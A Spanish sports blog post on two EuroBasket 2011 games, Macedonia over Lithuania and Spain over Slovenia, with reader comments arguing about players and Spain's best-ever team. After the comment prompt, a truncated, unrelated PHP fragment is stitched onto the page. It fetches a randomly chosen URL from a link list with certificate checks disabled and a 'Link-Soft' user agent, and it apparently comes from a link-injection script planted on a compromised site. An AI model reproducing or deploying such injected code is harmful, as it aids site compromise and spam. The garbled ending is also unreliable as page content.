EuroNBAsket 2011: Macedoniazo

15 de September de 2011 por TheDeerHunter

Macedonia 67 – Lituania 65: Sucedió. El día de ayer pasa a la historia negra del baloncesto lituano. Macedonia no contaba al principio para nadie pero a estas alturas tampoco puede sorprender. Ganaron porque fueron sutilmente mejores y porque los locales no soportaron la presión. Javtokas fue el mejor de los suyos y Songaila la punta de lanza, por el amor de Dios, y aún así los locales tuvieron la victoria en su mano.

El peor día para estar desacertados en el tiro. La mejor artillería exterior del torneo firmó un espantoso 13.3%. No es casualidad. El reverso tenebroso de ser favoritos rabiosos. De hecho, Macedonia se mantenía en el partido a base de triples con la inmaculada contribución de Stojanovski y el constante goteo de McCalebb, bajando todo lo posible el ritmo de juego. Los hombres altos macedonios realizaron un trabajo épico, igualando la lucha bajo aros a pesar de la sobrecarga de faltas. Por este motivo Lituania anotó con cierta comodidad a media y corta distancia, pero no lo suficiente como para escaparse en el marcador.

Al llegar al último cuarto en esta tesitura el miedo se palpaba en el pabellón de Kaunas y en cada lanzamiento se contenía el aliento. Macedonia, más sueltos sin nada que perder pero sufriendo lo indecible por el esfuerzo, con una plantilla más corta. Aún no entendemos de dónde sacó McCalebb las fuerzas para encontrar el aro en tres penetraciones casi suicidas en los últimos tres minutos, que colocaban a los locales en el borde del abismo y a él en la terna definitiva de candidatos al MVP. Un fatídico resbalón de Saras, con 2 arriba a falta de 30 segundos y triplazo de Ilievski completaron la gesta y la tragedia lituana, que tendrá que pelear mucho, sobre todo consigo misma, para alcanzar el preolímpico.

Destacado: Bo McCalebb 23 ptos, 2 reb, 2 asis

España 86 – Eslovenia 64: La tela de araña de Maljkovic sirvió para meter inicialmente el miedo en el cuerpo a sus rivales y empatar a cuartos. Gran inicio que llegó a acumular una ventaja de casi 10 puntos con el gran esfuerzo de Begic y Lorbek sobre los Gasoles. España reaccionó desde atrás, con una típica zona de Scariolo que apagó el primer fuego. A partir de ahí la evidencia de que si España pisa el acelerador tiene una pegada formidable: 36 puntos en el tercer cuarto, el récord del torneo ante una defensa trabajada. No pudo más Eslovenia que rendirse al genio de Navarro tocando la guitarra.

Sólo el ataque de orgullo mal entendido de Goran Dragic impidió una sangría mayor. Lesionó a Calderón y anotó algunas de las mejores canastas que ha logrado en el torneo. A buenas horas.

Destacado NBA: Pau Gasol 16 ptos, 19 reb, 3 tap, 2 rob
Destacado resto: Juan Carlos Navarro 26 ptos, 2 reb

Comenta

12 comentarios a esta entrada

  1. Txusma dice:
    #1

    Como mola por decir eso de “Yo ya lo dije” 😀

      Citar

  2. MagicJohnson32 dice:
    #2

    Yeah!

    Espectacular lo de McCalebb, sus tres penetraciones anotadas al final son un escándalo. Y la temblera de Lituania al final, con las pérdidas de balón que acaban con el triple de Ilievski, les delata: demasiada presión.

    Muy barriobajero lo de Dragic. Un profesional no puede hacer eso, menos aún en un partido ya decidido.

      Citar

  3. Pop dice:
    #3

    Esos 10 minutos de Navarro no tienen nada que envidiarle a momentos puntuales de inspiración de Kobe. Qué barbaridad.

      Citar

  4. Denise dice:
    #4

    Gran fracaso el de Lituania y bien los arbitros por no dejarse llevar por la presión. McCalebb muy bien, pero no creo que Macedonia pueda con España, el base meterá sus 20 puntos pero el resto no debería hacer mucho daño. Si yo fuese Scariolo pondría a Sada o Llull a defender a McCalebb. Sinceramente, Ricky no me inspira confianza (ni lo hubiese seleccionado entre los 12) y si Calderón bien es una coladera, con el tobillo mal ni me lo quiero imaginar.
    Y lo peor es que otra vez me tocará ver el partido diferido por los malditos horarios. Y despues se quejan por las audiencias del basket europeo…, que manera de no saber vender un producto.

    Y sobre el Francia-Rusia creo que será muy igualado, se decidirá por detalles, aunque doy a Rusia ligeramente como favorita. Francia tiene mas equipo y fisico, pero David Blatt me parece el mejor coach del Eurobasket y tendrá algo preparado sobre los franceses.

    Y por ahora el mejor quinteto del Eurobasket se lo daría a McCalebb-Navarro-Batum-Kirilenko-Gasol.

      Citar

  5. Denise dice:
    #5

    PD: Gasol me refería a Pau.

    Otro jugador que me encanta y no conocía (ademas de Benzing) es el base ruso Shved….un tremendo jugón que no necesita vender hamburguesas ni estar endiosado por la prensa.

      Citar

  6. Nacho dice:
    #6

    Creo que con lo de Batum te has pasado.
    Supongo que son gustos, pero yo confío, y mucho, en Ricky. Y si alguno sobra de los doce, él no es.
    Calde está defendiendo bien, mejor que lo hace habitualmente. El problema de parar a McCalebb no debe ser solo suyo
    La peor Lituania de la historia, con diferencia. Pocos nombres de esta selección darán que hablar. Valanciunas y ya.
    Macedonia es un señor equipo, solo había que verlos con sus aficionados después del partido (esos sí que dan miedo) Hasta McCalebb estaba allí. Eslovenia tiene muchísimo más talento, pero está a años luz como equipo. Ni Maljkovic puede hacerlo en un rato. Es una pena, porque si hubiesen llegado al preolímpico igual le hubiera dado tiempo a perfilarlo y ser un serio rival en los JJOO.

      Citar

  7. Denise dice:
    #7

    No todo en el baloncesto es numero, pero daré los de Batum.
    Puntos: 13,7
    Rebotes: 2,7
    Asistencias: 1,1
    Robos: 2,2
    Tiros de 2: 60,8 %
    Tiros de 3: 41,4 %

    Ya quisiera España tener a un Batum en su vida.

      Citar

  8. TheDeerHunter dice:
    #8

    Kirilenko: 14.6 ptos, 6 reb, 2.3 asis, 2.9 rob

      Citar

  9. Denise dice:
    #9

    Tambien metí a Kirilenko en el 5 inicial.

    Además, dí los numeros de Batum (los cuales ya se han incrementado tras el partidazo de ayer), y precisamente él es un tipo de jugador que te hace muchos intangibles..
    Y el que rompe el partido ayer vuelve a ser Batum con un par de triples y un mate con 2+1 ayudado por un sorprendente Traore. Al final, Parker acaba por sentenciar a Rusia con el famoso triple que le dedica a Ponkhrasov, y un par de entradas más.

      Citar

  10. Nacho dice:
    #10

    i es por intangibles y demás, De Colo ha sido más decisivo con Francia (salvo ayer, y tampoco te creas) que Batum. Si es por números, Marc está por encima de Batum. Pero obviamente no van a poner a tre españoles, aunque se gane. Todo dependerá del resultado de la final, y de si se hace por puestos puros (que lo dudo).
    Según la tónica de últimos campeonatos (si no recuerdo mal, que tampoco me dura en la memoria eso) pondrán a uno de los cuatro semifinalistas y a dos del campeón.
    Si gana España podría ser: Parker-MacCalebb-Navarro-Kirilenko-Gasol.
    Si gana Francia podría entrar Batum (que no creo que lo merezca a no ser que se haga un partidazo contra España) por Navarro.
    Por otro lado si buscan un cinco, y no lo quieren llenar de españoles podría ser Noah (que no se yo), o Kristic, que a pesar de Serbia, ha hecho buen campeonato..
    Bueno, eso son cábalas. veremos si me meto a pitoniso.
    Del campeonato yo me quedo con la agradable sorpresa de Macedonia, que si encuentran por ahí algún jugador más que añadir a este bloque pueden estar en JJOO, y conlosmomentos dulces de España, queemuestra que cuando está al 80% está a años luz de los demás.

      Citar

  11. Denise dice:
    #11

    Abro un debate.
    Escucho con bastante frecuencia que la actual selección española es la mejor seleccion española de la historia. ¿Soy el unico que discrepa? Por nombres puede parecer que sí, pero si miramos los contextos (como dice Lillo) de cada torneo la del 2006 era muuuucho mejor.
    Para empezar el Calde del 2006 era muy superior al de ahora, sobre todo en al apartado ofensivo. Ya ni siquiera es una seria amenaza de 3. Cabezas y Rodriguez tambien cuajaban mejor en su rol de base suplente que Ricky y Sada. Cabezas venía de hacer un temporadón con el Unicaja ganador de Liga ACB de ese año, y Rodriguez tuvo un año bastante bueno (el único en su vida), mientras que Sada cumple, Ricky está para darle de comer aparte.
    Siguiendo con los escoltas, Navarro es igual de bueno ahora que en 2006, pero Rudy es otro que ha evolucionado para atrás. El Rudy de 2011 ni en la Selección ni en la NBA, tiene esa alegría y chispa, ni esos tiros de 3 in your face que tenía en 2006 hasta el 2008. Ni siquiera hace ya la jugada del alley-oop, no mira el aro. Y en la comparación Berni-LLull, para el rol que ocupan, me quedo con el Berrni de 2006 (que al igual que Cabezas hizo un temporadón con Unicaja), siendo capaz de defender a doses y treses. Su defensa a Papaloukas y Diamantidis en la final de 2006 fue clave. En cambio, Llull está negado, contraataques y poco más. En estático ni la huele.
    Y en los aleros es donde más diferencia hay. No me explayaré mucho, porque ni merece la pena comparar a Jimenez y Mumbrú con San Emeterio y Claver. Sobran los comentarios.
    En cuanto a los pivots, Pau igual de bueno ahora que antes, Felipe muuucho peor ahora que en 2006, dehecho me temo que el año que viene será el cuarto pivot del Madrid tras Tomic, Mirotic y Begic, y en cuanto a la comparación Ibaka-Garbajosa, decir que el madrileño debió ser el MVP del torneo a mi juicio. Ibaka aporta muchisimas cosas a la selección, cosas distintas a las de Garba, pero nunca siendo tan determinante y letal como el Garba del 2006. Sólo Marc Gasol claramente es mejor que aquel que entró en la convocatoria de Japón por casualidad.
    Conclusión: Para mi la mejor selección española de la historia, la del 2006. (En 2007 creo que fueron los mismos pero con Garbajosa cojo)

      Citar

  12. TheDeerHunter dice:
    #12

    Me parece interesantísima la cuestión, incluso ahora a toro pasado.

    Yo sí creo que esta es la mejor selección de la historia. Para mí la cuestión se resuelve por el juego interior. Creo que la parejita de Gasoles al nivel de ahora superan en mucho al Pau+Garbajosa del 2006. Garbajosa fue cojonudo para España y definió al moderno ‘4’ FIBA, tirador, que tan de moda está ahora en todas las selecciones, pero Pau de pívot marca menos diferencias que de 4 y Marc es ahora uno de los mejores pívots del mundo. Obviamente nada que ver al de entonces. No parece descabellado decir de ellos que es la mejor pareja interior del mundo. La del 2006 no creo que lo fuera.
    Para mí Felipe en el mejor de los casos jamás se hubiera podido comparar a Ibaka, pero es que además a mí me ha parecido que ha hecho el torneo más eficaz y serio de su vida. Sin lugar a dudas el de más mérito. De todas formas admito que posiblemente cuando se habla de la mejor selección de la historia se tiene en cuenta al Ibaka que posiblemente llegue a ser y no el que ha sido.

    De alero creo que eres muy injusto. Lógicamente nada que reprochar a Jimenez, que es irreemplazable por muchos motivos, ni tampoco a Mumbrú. Pero de entrada Rudy ha defendido la posición con una dignidad y un sacrificio bestiales, cuando siempre juega en desventaja. No puede haber ninguna queja de él, todo lo contrario. Tampoco es ninguna barbaridad decir que ofensivamente es superior a Jimenez.
    De San Emeterio no sé qué se puede decir malo más allá de que no le han dado bola (porque Rudy lo ha hecho muy bien y tiene mucho peso, entre otras cosas) Claver ha tenido un torneo muy difícil por muchos motivos. Hacer leña de eso es ignorar muchísimas cuestiones que escapan a la calidad del jugador. Te repito que en Valencia hay muy pocas quejas de él… que le pregunten a Pesic a ver qué opina de su nivel. Yo no tengo ninguna duda de que tarde o temprano cerrará bastantes bocas. Tenerle como jugador nº 12 es un lujazo consecuencia únicamente del carácter de “mejor selección de la historia”… y ahí tienes otra clave. ¿Quién se quedó fuera en el 2006? Aquí se han quedado gente del nivel de Carlos Suarez o Rafa Martinez. Casi nada.

    El tema Navarro y Calderón diría que tiene que ser un empate con su propia versión del 2006. Así lo hemos visto. Lo que hayan perdido de piernas lo han ganado por cabeza y experiencia.

    La cuestión Berni vs Llull o Cabezas&Sergio vs Ricky&Sada quizás la ganarían los del 2006, aunque no por mucho. El rendimiento de Llull o Ricky no ha sido el deseado, pero en el peor de los casos ofrecen un trabajo defensivo que no desmerece a nadie y potencialmente son superiores a Berni y Cabezas.
    No hemos visto una exhibición puntual como la de Sergio pero tampoco la hemos echado en falta e incluso Sada sin apenas tener oportunidades ha tenido sus momentos importantes.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>